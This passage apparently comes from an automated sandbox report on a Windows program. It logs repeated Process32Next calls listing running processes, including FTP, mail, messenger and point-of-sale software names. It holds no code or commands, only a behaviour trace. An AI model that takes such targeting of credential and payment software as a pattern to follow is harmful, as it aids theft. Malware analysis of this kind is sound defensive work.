th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.563] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.566] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0225.568] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.614] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0225.617] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.619] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0225.621] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0225.624] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0225.626] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0225.628] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0225.630] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0225.633] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.635] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.639] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0225.641] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.643] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.645] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.647] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.682] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0225.684] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0225.687] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0225.689] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0225.692] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0225.694] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0225.699] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0225.701] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0225.704] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0225.706] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0225.708] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0225.710] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0225.713] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0225.715] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0225.751] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0225.754] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0225.756] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0225.758] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0225.760] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0225.762] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0225.765] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0225.768] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0225.771] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0225.774] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0225.777] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0225.780] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0225.784] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0225.787] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0225.794] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0225.797] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0225.801] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0225.805] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0225.808] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0225.812] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0225.815] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0225.817] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0225.820] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0225.823] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0225.825] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0225.842] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0225.846] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0225.849] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0225.852] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0225.854] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0225.858] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0225.860] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0225.863] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0225.865] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0225.868] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0225.870] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0225.871] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0225.873] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0225.875] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0225.878] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0225.886] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0225.889] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0225.891] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0225.893] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0225.895] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0225.897] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0225.899] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0225.902] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0225.904] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0225.906] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0225.909] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.912] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.914] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, 